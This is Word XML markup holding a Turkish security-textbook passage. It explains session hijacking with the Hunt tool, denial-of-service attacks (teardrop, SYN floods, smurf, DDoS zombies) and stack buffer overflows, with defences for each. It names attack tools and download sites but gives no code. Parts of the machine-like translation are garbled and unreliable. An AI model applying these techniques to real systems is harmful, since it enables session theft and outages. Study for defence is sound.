    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Oturum Çalma</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>Engelleme, saldırganın ağ bağlantılarıyla ilgili verileri görüntülemesine izin verirken, bir oturum kaçırma aracı, saldırganın ağ bağlantılarını ele geçirmesine, meşru kullanıcıyı başlatmasına veya bir oturum açmasına izin verir. Oturum ele geçirme araçları, Telnet, rlogin veya FTP gibi kalıcı oturum açma oturumlarına sahip hizmetlere karşı kullanılır. Bu hizmetlerden herhangi biri için bir saldırgan bir oturumu kapatabilir ve çok fazla zarara neden olabili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Oturumu ele geçirmeyi gösteren yaygın bir senaryo, bir kullanıcı olan Alice'i, Telnet'i kullanarak başka bir sistemi (Bob) uzaktan yönetmek için giriş yapmış olan bir makineyi içerir. Saldırgan Eve, Alice ve Bob (Alice’in LAN’ı, Bob’un LAN’ı veya Alice’in ile Bob’in LAN'ları arasındaki yönlendiriciler arasında bir ağ segmentinde oturuyor).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Oturumu ele geçirme aracını kullanarak Eve aşağıdakilerden herhangi birini yapabilir:</w:t>
      </w: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xml:space="preserve">• Alice’in oturumunu izleyin. Oturum ele geçirme araçlarının çoğu, saldırganların ağda bulunan tüm bağlantıları izlemesine ve hangi bağlantıları kesmek istediklerini seçmelerine izin verir. </w:t>
      </w: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lastRenderedPageBreak/>
        <w:t xml:space="preserve">• Oturuma komutları ekleyin. Saldırganın Bob'u yapılandırmak için akışa bir veya iki komut eklemesi gerekebilir. Bu tür bir kaçırma olayında, saldırgan hiçbir zaman oturumun kontrolünü tam olarak ele almaz. Bunun yerine, Alice’in Bob’a giriş oturumu, Alice’in yazdığı gibi Bob’da uygulanacak olan çok sayıda komut içerir. </w:t>
      </w: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xml:space="preserve">• Oturumu çalın. Çoğu oturum ele geçirme aracının bu özelliği, bir saldırganın oturumu Alice'den alıp doğrudan kontrol etmesini sağlar. Temel olarak, Telnet müşteri kontrolü Bob’un haberi olmadan Alice’ten Eve’e kaydırılıyor. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB0152" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0152">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>• Oturumu geri verin. Bazı oturum kaçırma araçları, saldırganın bir oturumu çalmasına, sunucuyla etkileşime girmesine ve ardından oturumu sorunsuz bir şekilde kullanıcıya geri vermesine izin verir. Oturum çalınırken, Alice oturumu kontrol ederken Alice bekletilir. Alice beklemede iken, Alice tarafından yazılan tüm komutlar Eve’in ekranında görüntülenir, ancak Bob’a iletilmez. Havva Bob üzerinde değişiklik yaparak bitirildiğinde, Havva kontrolü Alice'e geri gönderir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:noProof/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3978275" cy="1899920"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5080"/>
            <wp:docPr id="38" name="Resim 38"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8275" cy="1899920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001D46E6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>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EXHIBIT 10.1 Eve, Alice ile Bob arasındaki seansı kaçırıyo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aşarılı bir kaçırma olayının gerçekleşmesi için saldırganın Alice ile Bob arasında bir LAN segmentinde olması gerekir. Bir oturum kaçırma aracı, her yöne giden paketlerin TCP sıra numaralarını gözlemleyerek, bir bütünleşik sniffer kullanarak bağlantıyı izler. Alice'ten Bob'a gönderilen her paket, Bob tarafından tüm paketlerin alındığını ve doğru sıralandığını doğrulamak için kullanılan benzersiz bir TCP sıra numarasına sahiptir. Aynı şekilde, Bob’dan Alice’e geri gönderilen tüm paketlerin sıra numaraları vardır. Bir oturum kaçırma aracı, bu sıra numaralarını belirlemek için paketleri koklar. Bir oturum ele geçirildiğinde (komut ekleme ya da oturum çalma yoluyla), ele geçirme aracı otomatik olarak uygun sıra numaralarını kullanır ve Alice'in bıraktığı yerde Bob'la konuşmayı devralarak Alice'in adresini sapta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ugün mevcut olan en işlevsel oturum kaçırma araçlarından biri Kra tarafından yazılmış ve http://www.cri.cz/kra/index.html adresinde bulabileceğiniz Hunt. Hunt, bir saldırganın oturumları izlemesini ve çalmasını, tek komutlar eklemesini ve hatta kullanıcıya geri oturum vermesini sağla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rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Oturum Kaçırma Savunması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>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Oturum kaçırmaya karşı en iyi savunma, güvensiz protokollerin ve hassas oturumlar için uygulamaların kullanılmasından kaçınmaktır. Kaçırılması kolay (ve tutması kolay) Telnet uygulamasını kullanmak yerine, daha güvenli, şifreli bir oturum aracı kullanılmalıdır. Saldırganın oturum şifreleme anahtarları olmadığından, şifreli bir oturum kaçırılamaz. Saldırgan basitçe Hunt kullanarak şifreli anlamsız sesler görecek ve yalnızca bağlantıyı sıfırlayabilecek, devralacak ya da komut ekleyemeyecek.</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Güvenli kabuk (ssh), Telnet ve rlogin'e oldukça güvenli bir alternatif sağlayan güçlü kimlik doğrulama ve şifreli oturumlar sunar. Ayrıca, ssh, geleneksel FTP'yi değiştirmek için güvenli bir dosya aktarma özelliği (scp) içerir. Güvenli, şifreli Telnet veya kaynak ile hedef arasında kurulan sanal bir özel ağ (VPN) dahil olmak üzere başka alternatifler de mevcuttu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3034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Hizmet Reddi Saldırıları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC"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xml:space="preserve">Hizmet reddi saldırıları bugün mevcut olan en yaygın istismarlar arasındadır. Adından da anlaşılacağı gibi, hizmet reddi saldırısı meşru kullanıcıların bir sisteme erişmesini önler. Birçok kuruluşun can damarı olan ve dünya ekonomisinin büyümekte olan bir parçasını oluşturan E-ticaret uygulamalarıyla, iyi zamanlanmış bir hizmet reddi saldırısı büyük ölçüde hasara neden olabilir. Hassas makineleri veya diğer işlevleri kontrol eden sunucuları aşağı indirerek, bu </w:t>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>saldırılar yaşam ve uzuv için gerçek bir fiziksel tehdit oluşturabilir. Saldırgan, sahte trafiği olan bir sistemi silerek veya hatta bilerek sunucunun çökmesine neden olarak hizmet reddine neden olabilir. Sayısız hizmet reddi saldırısı bugün yaygın bir şekilde kullanılıyor ve http://packetstorm.securify.com/exploits/DoS adresinde bulunabilir. En sık kullanılan ağ tabanlı hizmet reddi saldırıları iki kategoriye ayrılır: hatalı biçimlendirilmiş paket saldırıları ve paket saldırıları.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>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3034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Kötü Biçimli Paket Saldırıları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>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u tür bir saldırı genellikle beklenmeyen bir şekilde biçimlendirilmiş bir veya iki paketi içerir. Birçok satıcı ürünü uygulaması, kullanıcı girişlerinin veya paket türlerinin tüm çeşitlemelerini hesaba katmaz. Yazılım bu tür hataları kötü bir şekilde ele alırsa, sistem bu paketleri aldığında çökebilir. Bu tip saldırılara klasik bir örnek, IP fragmanlarının birbiriyle örtüşen bir sisteme gönderilmesini içerir (fragman ofset değerleri yanlış ayarlanmış). Bazı yamalı Windows ve Linux sistemleri bu tür paketlerle karşılaştıklarında çökecektir. Gözyaşı saldırısı, bu IP parçalanma işleme güvenlik açığından yararlanan bir araç örneğidir. TCP / IP uygulamalarında diğer zayıf noktalardan yararlanan diğer hatalı biçimlendirilmiş paket saldırıları arasında rengarenk WinNuke, Land, LaTierra, NewTear, Bonk, Boink vb.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>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br/>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Paket Taşkın Saldırıları</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3034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Paket servis reddi araçları, ağdaki bir sisteme bir miktar trafik sıkıntısı çekerek meşru kullanıcılara yanıt verme yeteneğini zorluyor. Saldırganlar, en çok SYN'leri olmak, yayın saldırılarını yönlendirmek ve hizmet reddi araçlarını dağıtmakla birlikte bu tür alanları oluşturmak için sayısız teknik geliştirdile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YN  araçları, bir dizi SYN paketi göndererek sistemle çok sayıda yarı-açık bağlantı başlatır. Herhangi bir TCP bağlantısı kurulduğunda, üç yönlü bir el sıkışma meydana gelir. Başlangıç ​​sistemi (genellikle müşteri), o oturumdaki kaynaktan hedefe giden tüm paketler için bir sıra numarası oluşturmak üzere hedefe bir SYN paketi gönderir. Hedef, kaynaktan hedefe giden paketler için dizi numarasını onaylayan ve karşı yöne giden paketler için bir ilk dizi numarası belirleyen bir SYN-ACK paketi ile yanıt verir. Kaynak, hedefe bir ACK göndererek üç yönlü el sıkışmasını tamamlar. Üç yollu el sıkışma tamamlandı ve iletişim (gerçek veri aktarımı) gerçekleşebili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YN ’ler TCP’nin üç yollu el sıkışmasında zayıflıktan yararlanıyor. Saldırgan, yalnızca sahte SYN paketleri göndererek ve hiçbir zaman SYN-ACK'ya yanıt vermediğinde, sunucunun başlatılan tüm oturumların durumunu koruma yeteneğini tüketebilir. Çok sayıda yarı açık bağlantı adı verilen bir sunucu ile bir sunucu yeni, meşru bir trafiği kaldıramaz. Tüm boru bant genişliğini bir sunucuya bağlamak yerine, yalnızca sunucunun oturum başlatma işlemlerini gerçekleştirme kapasitesinin aşırı boğulması gerekir (çoğu ağ konfigürasyonunda, bir sunucunun SYN'leri işleme yeteneği sitenin toplam bant genişliğinden düşüktür). Bu nedenle, SYN od ooding en popüler paket saldırısıdır. ICMP ve UDP paketlerine sahip sistemleri kullanan diğer araçlar da mevcuttur, ancak bunlar sadece bant genişliği kullanırlar, bu nedenle bir saldırgan tüm hizmetleri kesmek için kurbandan daha büyük bir bağlantıya ihtiyaç duya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aldırganların bant genişliğini artırmalarına izin veren başka bir paket türü, yönlendirilmiş yayın saldırısıdır. Genelde, bu tekniği kullanan ilk araçtan sonra adlandırılan bir saldırı saldırısı olarak adlandırılan yayın saldırıları, üçüncü tarafın ağını paketin elçisi olarak kullandı. Bir saldırı saldırısında, saldırgan Internet'te yayın ICMP iletisine yanıt verecek bir ağ bulur (esas olarak ağın yayın adresine ping). Ağ, yayın isteklerine ve yanıtlarına izin verecek şekilde yapılandırılmışsa, ağdaki tüm makineler ping'e bir yanıt gönderir. ICMP isteğini yerine getirerek, saldırganın üçüncü taraf ağdaki tüm makinelerin mağdurlara yanıt göndermesini sağlayabilirsiniz. Örneğin, bir kuruluşun İnternete bağlı tek bir DMZ ağında 30 ana bilgisayarı varsa, bir saldırgan, DMZ'ye ping gönderen sahtekar bir ağ gönderebilir. Her 30 ev sahibi, nihai kurban olacak sahte adrese bir yanıt gönderecek. Saldırganın tekrar tekrar gönderdiği mesajlar gönderildiğinde, saldırganın 30 kat fazla bant genişliği vardır. Yalnızca 56 kbps çevirmeli ağ hattına sahip bir saldırgan bile bu seviyedeki bir T1 hattını (1,54 Mbps) oluşturabilir. Diğer yönlendirilmiş yayın saldırı araçları arasında Fraggle ve Papasmurf bulunu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xml:space="preserve">Önemli bir baskı alan son hizmet reddi türü, hizmet reddi saldırısıdır. Temel olarak standart paket kavramlarına dayanan Şubat 2000'de birçok büyük İnternet sitesini engellemek için hizmet reddi saldırıları kullanıldı. Trin00, Tribe Flood Network 2000 (TFN2K) ve Stacheldraht gibi araçlar bu tür saldırıları destekliyor. Dağıtılmış hizmet reddi saldırısı yapmak için, saldırganın İnternet üzerinde çok sayıda savunmasız sistem bulması gerekir. Genellikle, bir düzine, yüz </w:t>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>hatta binlerce makineyi devralmak için aşırı akış saldırısı (aşağıda açıklanmıştır) gibi uzak bir tampon kullanılır. Saldırgan tarafından ele geçirilen bu makinelere zombiler adı verilen basit daemon işlemleri yüklenmiştir. Saldırgan, bir kontrol programı kullanarak bu zombi ağı ile iletişim kurar. Kontrol programı, yüzlerce veya binlerce zombiye komut göndermek ve eşzamanlı olarak aynı işlemi yapmalarını istemek için kullanılı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Alınacak en yaygın eylem, aynı anda bir hedefe karşı bir paket unu başlatmaktır. Geleneksel bir SYN, bir ana bilgisayardan gelen paketleri içeren bir hedefi engellerken, dağıtılmış bir hizmet reddi saldırısı, çok yüksek bant genişliğine sahip, iyi tasarlanmış sitelerin kapasitesini hızla tüketen çok sayıda zombiden paketler gönderir. Dağıtılmış hizmet reddi saldırı araçlarının çoğu, SYN, UDP ve ICMP'nin kokusu, şirin saldırıları ve bazı hatalı biçimlendirilmiş paket saldırılarını destekler. Bu seçeneklerden herhangi biri veya tümü, kontrol programı kullanılarak saldırgan tarafından seçilebili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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Hizmet Reddi Saldırı Savunması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>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Hatalı biçimlendirilmiş paket saldırılarına karşı korunmak için sistem yamaları ve güvenlik dosyalarının düzenli olarak uygulanması gerekir. Satıcılar, hizmet reddi saldırısının yeni alanını ele almak için sistemlerini sık sık yamalar ile günceller. Bir kuruluşun, güvenlik sertifikaları için satıcı ve endüstri güvenlik bültenlerini izlemek için bir programa ve açıklanmaları ve test edilmelerinden hemen sonra bu ilaçları uygulamak için kontrollü bir metoda sahip olması gerek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Paket kaynaklı saldırılar için kritik sistemler, tek bir başarısızlık noktasını ortadan kaldırarak birden fazla, gereksiz yolu olan temel ağ mimarilerine sahip olmalıdır. Ayrıca, yeterli bant genişliği şarttır. Ayrıca, bazı yönlendiriciler ve geri dönüş duvarları bir SYN yükünün yükünü hafifletmek için trafik kontrolünü desteklemekted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Son olarak, internete erişilebilen bir ağın uygun şekilde yapılandırılmasıyla bir kuruluş, bunun şirin ve dağıtılmış hizmet reddi saldırıları için bir başlangıç ​​noktası olarak kullanılması olasılığını en aza indirebil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Şirin olarak kullanılma olasılığını önlemek için, tüm yönlendirilmiş yayın taleplerini İnternet'ten düşürmek için dış yönlendirici veya güvenlik duvarı yapılandırılmalıdır. Dağıtılmış bir hizmet reddi saldırısında kullanılma şansını azaltmak için bir kuruluşun, dışarıdan gelen tüm trafiğin sitenin kaynak IP adresine sahip olduğundan emin olmak için dış yönlendiriciler ve geri dönüş duvarları üzerine anti-spoof filtreleri uygulaması gerekir. Bu çıkış filtreleme, saldırganın ağda bulunan bir zombi veya hizmet reddi aracından sahte paket göndermesini önler. İnternetten gelen tüm paketleri, birinin dahili ağından geldiğini iddia eden antispoof giriş filtreleri, hizmet reddi saldırılarını önlemede de faydalıdır.</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3034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Yığın Tabanlı Tampon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Aşırı Yük</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="003034AC"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Yığın tabanlı aktarma saldırıları yığın saldırgan tarafından ağ üzerinden uzaktan bir sistemi ele geçirmek için yaygın olarak kullanılır. Ek olarak, satırlar üzerindeki arabellek, yerel kötü niyetli kullanıcılar tarafından ayrıcalıklarını yükseltmek ve bir sisteme süper kullanıcı erişimi sağlamak için kullanılabilir. Yığın tabanlı tampon üzerinden akış saldırıları, birçok işletim sisteminin yığınlarını işleme biçiminden, programları çalıştırarak geçici olarak veri depolamak için kullanılan dahili bir veri yapısından yararlanır. Bir işlev çağrısı yapıldığında, yürütme programının mevcut durumu ve işleve iletilecek değişkenler yığına itilir. İşlev tarafından kullanılan yeni yerel değişkenler de yığında boşluk tahsis edilir. Ek olarak, yığın işlevi çağıran kodun dönüş adresini saklar. Bu geri dönüş adresine, işlev çağrısı tamamlandıktan sonra yığından erişilir. Sistem bu adresi çağıran programın yürütülmesini uygun bir yerde sürdürmek için kullanır. Sergi 10.2 bir yığının nasıl yapıldığını gösteri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Çoğu UNIX ve tüm Windows sistemleri, verileri ve yürütülebilir kodları tutabilecek bir yığına sahiptir. Bir işlev çağrıldığında yerel değişkenler yığında depolandığından, bu değişkenlerin sınırlarını üst üste koymak için zayıf koddan yararlanılabilir. Eğer kullanıcı girişi uzunluğu kodla incelenmezse, yığın üzerindeki belirli bir değişken, yığın üzerinde kendisine ayrılan hafızayı aşabilir, tüm değişkenlerin üzerine yazabilir ve fonksiyon tamamlandıktan sonra yürütmenin devam etmesi gereken dönüş adresleri bile olabilir. Yığın "parçalanması" olarak adlandırılan bu işlem, bir saldırganın, yerel değişkenleri çalıştırılabilir kod ve yığına başka bir dönüş adresi eklemek için devretmesine izin verir. Sergi 10.2 ayrıca, aşağıya bir tampon ile parçalanmış bir yığını göster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 xml:space="preserve">Saldırgan, çalıştırılabilir komutlardan oluşan (genellikle bir kabuk rutini) makineye özgü bayt kodları ve bu eklenen komutların yürütülmesini başlatmak için bir dönüş işaretçisiyle yığındaki </w:t>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>tamponu yükler. Bu nedenle, çok dikkatli bir şekilde oluşturulmuş ikili kodla, saldırgan kullanıcı olarak gerçekten yürütülebilir kod ve yeni bir dönüş adresinden oluşan bir programa bilgi girebilir. Adamcağız program bu girişin uzunluğunu analiz etmeyecek, ancak yığına yerleştirecek ve saldırganın kodunu çalıştırmaya başlayacaktır. Bu güvenlik açıkları bir saldırganın uygulama kodundan çıkmasına ve bozuk programın izinleriyle sistem bileşenlerine erişmesine izin verir. Bozuk program süper kullanıcı ayrıcalıklarıyla çalışıyorsa (örn., Bir UNIX sistemindeki SUID kökü), saldırgan, makinenin üzerinden bir arabellek kullanarak makineyi devraldı.</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C35E2D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="212121"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4821555" cy="1603375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31" name="Resim 3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n Alıntıs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1555" cy="1603375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>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EXHIBIT 10.2 Normal bir yığın ve üzerinde bir arabellek bulunan bir yığın.</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Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003034AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Yığın Tabanlı Tampon Aşırı Yük Savunması</w:t>
      </w:r>
